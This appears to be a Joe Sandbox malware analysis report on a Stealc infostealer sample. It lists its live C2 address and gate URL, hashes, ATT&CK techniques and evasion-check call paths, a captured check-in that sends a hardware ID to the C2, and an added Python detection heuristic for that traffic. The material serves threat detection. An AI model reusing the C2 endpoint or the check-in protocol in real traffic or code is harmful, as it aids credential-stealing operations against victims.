Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Create Account | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 13 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.206/c4becf79229cb002.php/r | 100% | Avira URL Cloud | malware |
http://185.215.113.206/c4becf79229cb002.php/3 | 100% | Avira URL Cloud | malware |
http://185.215.113.206/c4becf79229cb002.php/= | 100% | Avira URL Cloud | malware |
http://185.215.113.206/ctionSettingsLMEM80 | 100% | Avira URL Cloud | malware |
http://185.215.113.206/tVersion | 100% | Avira URL Cloud | malware |
http://185.215.113.206/c4becf79229cb002.phpM | 100% | Avira URL Cloud | malware |
http://185.215.113.206/c4becf79229cb002.php.j | 100% | Avira URL Cloud | malware |
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
185.215.113.206/c4becf79229cb002.php | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php/= | file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/ctionSettingsLMEM80 | file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/n | file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php.j | file.exe, 00000000.00000002.1522326773.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.phpM | file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/tVersion | file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.php/3 | file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.php/r | file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1558871
                        Start date and time:2024-11-19 22:11:07 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 15s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 18
                        • Number of non-executed functions: 121
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe
                        No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | LummaC, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Cryptbot, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, LummaC Stealer, Stealc | 185.215.113.206/
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Stealc, Vidar | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.43
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.43
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                        No context
                        No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.944188978912843
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'792'512 bytes
                        MD5:b3cec29dfcc248bc4f4f33ff5ba14470
                        SHA1:389dc1f719b34841eaa55c8e81ce0f773fea3acf
                        SHA256:841e3ab686e632551e2229d68366490832987ab47d308c54f6817f3e13a5ff52
                        SHA512:85803678ee823025990a8377b0b51335be58365bc1fcabff37e4ed1330b93438bbbb94e40908f3ccaea4631ba5d155d0391198ee3639630bd981cfedfdc5828a
                        SSDEEP:49152:eZVwZPBu0P7eKyJFw0RfC4xtyZZ3z5Xz+lQQCf2cj9:eV+PBbLdCbDY3t2HG
                        TLSH:E1853326D435C69FDE7A6BBCD8B381D05A103F88A172927A7E1056943C11F4FBB788C9
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0xa8c000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007FE4C171817Ah
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x249000 | 0x16200 | de612d100bc29461b0d3bdc2484f9ee1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x1ac | 0x200 | 775146942c9f332f93cdd84f3f434ef5 | False | 0.58203125 | data | 4.564552801879117 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x24c000 | 0x2a3000 | 0x200 | 2532f60218c7803dfe606fde863ed982 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tcmgcthi | 0x4ef000 | 0x19c000 | 0x19bc00 | b0a364ce8d2551200f870dd7ce73397d | False | 0.9945983701426837 | data | 7.953211456114112 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
suhmtczi | 0x68b000 | 0x1000 | 0x400 | 831deaf4d5f23bcb886ea03a53bf4f95 | False | 0.7109375 | data | 5.740246842116669 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x68c000 | 0x3000 | 0x2200 | 51d1105411ed3606ea60fbd526e7419d | False | 0.05330882352941176 | DOS executable (COM) | 0.6331999739279093 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x68a974 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-19T22:12:15.255016+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.8 | 49706 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 19, 2024 22:12:14.622323036 CET | 49706 | 80 | 192.168.2.8 | 185.215.113.206
Nov 19, 2024 22:12:14.829691887 CET | 80 | 49706 | 185.215.113.206 | 192.168.2.8
Nov 19, 2024 22:12:14.829802990 CET | 49706 | 80 | 192.168.2.8 | 185.215.113.206
Nov 19, 2024 22:12:14.830023050 CET | 49706 | 80 | 192.168.2.8 | 185.215.113.206
Nov 19, 2024 22:12:15.036994934 CET | 80 | 49706 | 185.215.113.206 | 192.168.2.8
Nov 19, 2024 22:12:15.037373066 CET | 80 | 49706 | 185.215.113.206 | 192.168.2.8
Nov 19, 2024 22:12:15.037549973 CET | 49706 | 80 | 192.168.2.8 | 185.215.113.206
Nov 19, 2024 22:12:15.040127039 CET | 49706 | 80 | 192.168.2.8 | 185.215.113.206
Nov 19, 2024 22:12:15.247406006 CET | 80 | 49706 | 185.215.113.206 | 192.168.2.8
Nov 19, 2024 22:12:15.251893044 CET | 80 | 49706 | 185.215.113.206 | 192.168.2.8
Nov 19, 2024 22:12:15.255016088 CET | 49706 | 80 | 192.168.2.8 | 185.215.113.206
Nov 19, 2024 22:12:18.155510902 CET | 49706 | 80 | 192.168.2.8 | 185.215.113.206
                        • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 185.215.113.206 | 80 | 6524 | C:\Users\user\Desktop\file.exe
Timestamp / bytes transferred / direction / data

Nov 19, 2024 22:12:14.830023050 CET   90 bytes   OUT
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Nov 19, 2024 22:12:15.037373066 CET   203 bytes   IN
HTTP/1.1 200 OK
Date: Tue, 19 Nov 2024 21:12:14 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Nov 19, 2024 22:12:15.040127039 CET   413 bytes   OUT
POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 38 44 38 46 46 32 44 30 31 35 33 32 35 36 34 35 30 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored, 211 bytes):
------IIEHJKJJJECFHJJJKKEC
Content-Disposition: form-data; name="hwid"

5A8D8FF2D0153256450765
------IIEHJKJJJECFHJJJKKEC
Content-Disposition: form-data; name="build"

mars
------IIEHJKJJJECFHJJJKKEC--

Nov 19, 2024 22:12:15.251893044 CET   210 bytes   IN
HTTP/1.1 200 OK
Date: Tue, 19 Nov 2024 21:12:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 for the word "block")

Note: neither request carries a User-Agent header. The GET / receives an empty-body 200; the POST to the .php gate carries only two form fields, a 22-character hex "hwid" and the build tag "mars", and the 8-byte reply decodes to "block". No further requests from this process appear in the capture after 22:12:18.
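The check-in above, turned into detection logic. This is an added example, not part of the Joe Sandbox report and not Stealc's own code: it re-types the captured POST and reply as constructed test data, parses the multipart body, decodes the reply, and scores a request against the markers visible in this session. The generalizations in `GATE_PATH` and `BOUNDARY_SHAPE` (16 hex characters plus `.php`, `----` followed by 20 capital letters) are assumptions derived from this single capture, not documented constants of the family.

```python
import base64
import re

# Constructed test data, re-typed from the captured session in the report: the POST
# check-in (path, headers, 211-byte multipart body) and the 8-byte reply body.
POST_PATH = "/c4becf79229cb002.php"
POST_HEADERS = {
    "Content-Type": "multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC",
    "Host": "185.215.113.206",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}
POST_BOUNDARY = "----IIEHJKJJJECFHJJJKKEC"
POST_BODY = (
    b"------IIEHJKJJJECFHJJJKKEC\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"5A8D8FF2D0153256450765\r\n"
    b"------IIEHJKJJJECFHJJJKKEC\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"mars\r\n"
    b"------IIEHJKJJJECFHJJJKKEC--\r\n"
)
REPLY_BODY = b"YmxvY2s="
GET_HEADERS = {"Host": "185.215.113.206", "Connection": "Keep-Alive", "Cache-Control": "no-cache"}

# Heuristics generalized from this single capture (assumptions, not documented constants):
# a gate named by 16 hex characters plus ".php", and a boundary of "----" + 20 capitals.
GATE_PATH = re.compile(r"^/[0-9a-f]{16}\.php$")
BOUNDARY_SHAPE = re.compile(r"^----[A-Z]{20}$")


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for a multipart/form-data body (RFC 2046 framing only)."""
    fields = {}
    for part in body.split(b"--" + boundary.encode()):
        part = part.strip(b"\r\n")
        if not part or part == b"--":        # preamble / closing "--" marker
            continue
        head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', head)
        if m:
            fields[m.group(1).decode()] = value.decode(errors="replace")
    return fields


def decode_reply(body: bytes) -> str:
    """The reply body is bare base64; reject anything that is not."""
    return base64.b64decode(body, validate=True).decode("ascii", errors="replace")


def classify_checkin(method: str, path: str, headers: dict, body: bytes):
    """Score one request against the markers seen in the capture.

    Returns (form fields, per-marker booleans, all-markers-hit).
    """
    m = re.search(r"boundary=([^;\s]+)", headers.get("Content-Type", ""))
    boundary = m.group(1) if m else None
    fields = parse_multipart(body, boundary) if method == "POST" and boundary else {}
    markers = {
        "post": method == "POST",
        "gate_path": bool(GATE_PATH.match(path)),
        "boundary_shape": bool(boundary and BOUNDARY_SHAPE.match(boundary)),
        "hwid_and_build": {"hwid", "build"} <= set(fields),
        "no_user_agent": "User-Agent" not in headers,
    }
    return fields, markers, all(markers.values())


if __name__ == "__main__":
    fields, markers, hit = classify_checkin("POST", POST_PATH, POST_HEADERS, POST_BODY)
    print("fields:", fields)
    print("markers:", markers, "-> stealc-like check-in" if hit else "-> no match")
    print("server reply decodes to:", repr(decode_reply(REPLY_BODY)))
```

Requiring all five markers keeps the rule quiet on ordinary form uploads; the missing User-Agent and the bare-base64 reply are the two features most worth keeping even if a later build changes the gate name or boundary alphabet.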


                        Target ID:0
                        Start time:16:12:10
                        Start date:19/11/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x400000
                        File size:1'792'512 bytes
                        MD5 hash:B3CEC29DFCC248BC4F4F33FF5BA14470
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1480967160.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true


                          Execution Graph

                          Execution Coverage:4.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.3%
                          Total number of Nodes:1406
                          Total number of Limit Nodes:28
execution_graph (the report's flattened node/edge dump, condensed into call paths; six-character values are code addresses in file.exe, "N API calls" is the report's summary for a subgraph it did not expand, "|" separates the two successors of a branch, ".." spans a run of consecutive nodes)

Unconnected root nodes:
  423cc0  GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy
  4233c0  GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA
  418615  49 API calls (second instance: 48 API calls)
  41e049  147 API calls
  422853  lstrcpy
  422cd0  GetUserDefaultLocaleName LocalAlloc CharToOemW
  413959  244 API calls
  4101d9  126 API calls
  42732f  lstrcpy lstrcat
  422d60  11 API calls
  422b60  GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA
  42a280  __CxxFrameHandler
  411269  408 API calls
  405869  57 API calls

Entry path from 421bf0 (each "| ... ExitProcess" branch below is one of the early-exit checks behind the report's "evasive API chain" and locale-check signatures):
  421bf0 -> 402a90: chain of calls to 404a60 (each 404a76 RtlAllocateHeap, 404ab4 VirtualProtect) from 402aa1 through 402e52, then 426390 GetPEB -> 4265c3 LoadLibraryA x5 | 4263c3 -> 4263d7 (20 API calls) -> 4265c3; 4265c3 -> GetProcAddress at 426625, 426641 (x2), 426675, 426691, 4266ad (x2) -> 4266d7 -> 421c03
  421c03 -> 421c29 lstrcpy -> 421c35 -> 421c65 ExitProcess | 421c6d GetSystemInfo
  421c6d -> 421c7d ExitProcess | 421c85 -> 401030 GetCurrentProcess VirtualAllocExNuma
  401030 -> 401057 ExitProcess | 40105e VirtualAlloc -> 40107d -> (40108a VirtualFree) -> 4010b1 -> 4010c0 -> 4010d0 GlobalMemoryStatusEx
  4010d0 -> 401112 ExitProcess | 4010f5 -> 40111a GetUserDefaultLangID -> 421ca2 | 421cb8
  421ca2 -> 421cb0 ExitProcess | 421cb8 -> 422ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA -> 422b24 -> 421cbd -> 422a40 GetProcessHeap RtlAllocateHeap GetUserNameA -> 421cd1
  421cd1 -> 421ce0 ExitProcess | 421ce7 lstrlen -> 421cff .. 421e30 (lstrcpy/lstrcat/lstrlen string assembly; 422ad0 and 422a40 are called once more on the way)
  421e30 -> 421e56 OpenEventA -> 421e68 CloseHandle Sleep OpenEventA (loops on itself) | 421e8c CreateEventA
  421e8c -> 421b20 GetSystemTime -> 421820 (string assembly 421849 .. 421b08) -> 421b81 sscanf -> 402a20 SystemTimeToFileTime SystemTimeToFileTime -> 421bd6
  421bd6 -> 421be2 ExitProcess | 421be9 -> 41ffd0
  41ffd0 -> 41ffe0 -> string assembly 42000d .. 42028e, calling 421570 (lstrcpy x4, 420155 lstrlen) -> 402e70: second chain of 404a60 calls, 402e82 .. 404981 (dump truncated at this point)
  420540 -> 421570 (4 API calls) -> string assembly 420599 .. 420751 -> 422740 GetWindowsDirectoryA; 42075d -> 42077d lstrcpy -> 420785 -> 404c50; 42078f -> 418ca0 StrCmpCA
  42079b -> 401530 (8 API calls) -> 4207bc -> 4207e5 lstrcpy -> 4207ed -> 4060d0 (80 API calls); 4207fa -> 4181b0 (10 API calls)
  420809 -> 401530 -> 42082f -> 420856 lstrcpy -> 42085e -> 4060d0; 42086b -> 417ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA
  420876 -> 401530 -> 4208a1 -> 4208c9 lstrcpy -> 4208d5 -> 4060d0; 4208db -> 418050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy
  4208e6 -> 401530 -> 4208f7 -> 420926 lstrcpy -> 42092e -> 405640 (8 API calls); 420933 -> 401530 -> 42094c -> 417280 (1498 API calls)
  42099f -> 401530 -> 4209cf -> 4209f6 lstrcpy -> 4209fe -> 4060d0; 420a0b -> 4183e0 (7 API calls); 420a18 -> 401530 -> 420a29 -> 4024e0 (230 API calls)
  420a6b -> 420a7f | 420b40
    420a7f -> 401530 -> 420aa5 -> 420acc lstrcpy -> 420ad4 -> 4060d0; 420ada -> 4185b0 (47 API calls); 420ae5 -> 401530 -> 420af6 -> 41d0f0 (118 API calls)
    420b40 -> 401530 -> 420b59 -> 420b7f lstrcpy -> 420b87 -> 4060d0; 420b8d -> 41c840 (70 API calls)
  420b38 -> 401530 followed by one module call per step: 420bb9 -> 41d7b0 (103 API calls, __call_reportfault); 420bcc -> 41ecb0 (98); 420bf5 -> 41dfa0 (149); 420c1e -> 41e500 (108); 420c47 -> 41e720 (120); 420c70 -> 41e9e0 (110); 420c99 -> 407bc0 (154); 420cc2 -> 41eb70 (108); 420ceb -> 4241e0 (91)
  420cf0 -> 420d04 | 420dca
    420d04 -> 401530 -> 420d2a -> 420d56 lstrcpy -> 420d5e -> 4060d0; 420d64 -> 4185b0 (47 API calls); 420d6f -> 401530 -> 420d80 -> 41d0f0 (118 API calls); 420dc2 -> 401530 -> 420e39
    420dca -> 401530 -> 420de3 -> 420e09 lstrcpy -> 420e11 -> 4060d0; 420e17 -> 41c840 (70 API calls)
  420e39 -> 420e5f lstrcpy -> 420e67 -> 4060d0; 420e74 -> 421660 (12 API calls) | 420e95 -> 421ea5 CloseHandle ExitProcess
26861->26862 26863 404a60 2 API calls 26862->26863 26864 404997 26863->26864 26865 404a60 2 API calls 26864->26865 26866 4049ad 26865->26866 26867 404a60 2 API calls 26866->26867 26868 4049c3 26867->26868 26869 404a60 2 API calls 26868->26869 26870 4049d9 26869->26870 26871 404a60 2 API calls 26870->26871 26872 4049ef 26871->26872 26873 404a60 2 API calls 26872->26873 26874 404a08 26873->26874 26875 404a60 2 API calls 26874->26875 26876 404a1e 26875->26876 26877 404a60 2 API calls 26876->26877 26878 404a34 26877->26878 26879 404a60 2 API calls 26878->26879 26880 404a4a 26879->26880 26881 4266e0 26880->26881 26882 426afe 8 API calls 26881->26882 26883 4266ed 43 API calls 26881->26883 26884 426b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26882->26884 26885 426c08 26882->26885 26883->26882 26884->26885 26886 426cd2 26885->26886 26887 426c15 8 API calls 26885->26887 26888 426cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26886->26888 26889 426d4f 26886->26889 26887->26886 26888->26889 26890 426de9 26889->26890 26891 426d5c 6 API calls 26889->26891 26892 426f10 26890->26892 26893 426df6 12 API calls 26890->26893 26891->26890 26894 426f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26892->26894 26895 426f8d 26892->26895 26893->26892 26894->26895 26896 426fc1 26895->26896 26897 426f96 GetProcAddress GetProcAddress 